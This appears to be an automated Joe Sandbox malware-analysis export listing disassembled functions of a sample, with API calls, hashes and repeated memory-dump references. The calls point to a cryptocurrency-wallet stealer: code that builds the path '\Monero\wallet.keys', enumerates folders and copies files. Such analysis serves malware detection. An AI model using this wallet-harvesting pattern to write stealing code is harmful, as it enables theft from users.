Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 610505c8cf74f4ebbbb7663228a975a0cc54a537c5a4ebbd1af18a39762ee966
Instruction ID: 4658048974c4da223f9336fa5089d39d28747a5c94bdc7efb688445d673ea6ba
Opcode Fuzzy Hash: 610505c8cf74f4ebbbb7663228a975a0cc54a537c5a4ebbd1af18a39762ee966
Instruction Fuzzy Hash: 27F06DB1A04208EBCB14DF84DC45FAAB7BCFB49B24F0046A9F515A2680D7796904CBE1

Function 0036B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

lstrlen.KERNEL32(00000000), ref: 0036B9C2
lstrlen.KERNEL32(00000000), ref: 0036B9D6

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: b16118fc41ce03216882566e8e40dd0cd71ff6f8dae046ceeca38975db429485
Instruction ID: 1e77109ebc2b7c2f9f7087c553dea02905923a3df927ae98e80de34f8c77c45e
Opcode Fuzzy Hash: b16118fc41ce03216882566e8e40dd0cd71ff6f8dae046ceeca38975db429485
Instruction Fuzzy Hash: 01E10872910518ABDB56FBA0CC91DEE773CBF94300F408159F11B6A091EF386A49DF62

Function 0036AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

lstrlen.KERNEL32(00000000), ref: 0036B16A
lstrlen.KERNEL32(00000000), ref: 0036B17E

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 4e5e1c6762c5420cc7b75a867da075907b2264c5472a186c25d155742b004942
Instruction ID: 42bef4da4eb802f99bc99cdfb76c2e31eaabc740b38be0943bba70542d2c779a
Opcode Fuzzy Hash: 4e5e1c6762c5420cc7b75a867da075907b2264c5472a186c25d155742b004942
Instruction Fuzzy Hash: A7913471910508ABCB16FBA0DC95DEE7738AF94300F408169F51BAB091EF386A49DF63

Function 0036B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

lstrlen.KERNEL32(00000000), ref: 0036B42E
lstrlen.KERNEL32(00000000), ref: 0036B442

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: a0cb11e9b2d2f517df1e2591b02b7bbcf8a6eb40e92a644a172a267e2de7014d
Instruction ID: 256cd9bc00b2c7af4304dd23b8fc7dd3fdf21d18480537b29f9134a62af54128
Opcode Fuzzy Hash: a0cb11e9b2d2f517df1e2591b02b7bbcf8a6eb40e92a644a172a267e2de7014d
Instruction Fuzzy Hash: D2712571910508ABDB16FBA0DC96DEE7778BF95300F408518F51AAB091EF386A09DB63

Function 00374BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00378DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378E0B

lstrcat.KERNEL32(?,00000000), ref: 00374BEA
lstrcat.KERNEL32(?,0114D940), ref: 00374C08

Part of subcall function 00374910: wsprintfA.USER32 ref: 0037492C
Part of subcall function 00374910: FindFirstFileA.KERNEL32(?,?), ref: 00374943

Part of subcall function 00374910: StrCmpCA.SHLWAPI(?,00380FDC), ref: 00374971
Part of subcall function 00374910: StrCmpCA.SHLWAPI(?,00380FE0), ref: 00374987
Part of subcall function 00374910: FindNextFileA.KERNEL32(000000FF,?), ref: 00374B7D
Part of subcall function 00374910: FindClose.KERNEL32(000000FF), ref: 00374B92

Part of subcall function 00374910: wsprintfA.USER32 ref: 003749B0
Part of subcall function 00374910: StrCmpCA.SHLWAPI(?,003808D2), ref: 003749C5
Part of subcall function 00374910: wsprintfA.USER32 ref: 003749E2
Part of subcall function 00374910: PathMatchSpecA.SHLWAPI(?,?), ref: 00374A1E
Part of subcall function 00374910: lstrcat.KERNEL32(?,0114EA78), ref: 00374A4A
Part of subcall function 00374910: lstrcat.KERNEL32(?,00380FF8), ref: 00374A5C
Part of subcall function 00374910: lstrcat.KERNEL32(?,?), ref: 00374A70
Part of subcall function 00374910: lstrcat.KERNEL32(?,00380FFC), ref: 00374A82
Part of subcall function 00374910: lstrcat.KERNEL32(?,?), ref: 00374A96
Part of subcall function 00374910: CopyFileA.KERNEL32(?,?,00000001), ref: 00374AAC
Part of subcall function 00374910: DeleteFileA.KERNEL32(?), ref: 00374B31

Part of subcall function 00374910: wsprintfA.USER32 ref: 00374A07

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 9a3079b6822a1dbcd93345b7ca80bb04d8e6999bc70bb7f0b6c5d336f4716187
Instruction ID: 0f643d9a70d98263e106ddac24b1c5d364b202f529bcc8555628343d16afb180
Opcode Fuzzy Hash: 9a3079b6822a1dbcd93345b7ca80bb04d8e6999bc70bb7f0b6c5d336f4716187
Instruction Fuzzy Hash: F94186B750020467CBA5F760EC42EFE733DA79A700F008949B65A9B185EF755A8C8B92

Function 00366660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00366706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00366753

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fbfe7915dc1904488278c0307f63fe9e77bf79ca1c3342262afa052e523e3c1d
Instruction ID: c81ebddecd586821169b300437f6e9379c1d06c20c583c51354a96e20a7b1283
Opcode Fuzzy Hash: fbfe7915dc1904488278c0307f63fe9e77bf79ca1c3342262afa052e523e3c1d
Instruction Fuzzy Hash: AA41E374A00209EFCB44CF98C495BADBBB1FF48354F24C2A9E8599B345D731AA81CB84

Function 00375050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00378DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378E0B

lstrcat.KERNEL32(?,00000000), ref: 0037508A
lstrcat.KERNEL32(?,0114E588), ref: 003750A8

Part of subcall function 00374910: wsprintfA.USER32 ref: 0037492C
Part of subcall function 00374910: FindFirstFileA.KERNEL32(?,?), ref: 00374943

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 099e11c9b1ec78243fcb34610c91b23fe2f66fd5f16dba6031a159414fca127e
Instruction ID: 7d2b5b5f27cbfa6b7d82183cdf6175164e873f3d0e364e2c53e556141a6ed0f9
Opcode Fuzzy Hash: 099e11c9b1ec78243fcb34610c91b23fe2f66fd5f16dba6031a159414fca127e
Instruction Fuzzy Hash: 8E019B7690020867C7A5FB70DC46EEE733CAB65300F008554B74E9A191EF789A8DDBA2

Function 003610A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003610B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003610F7

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
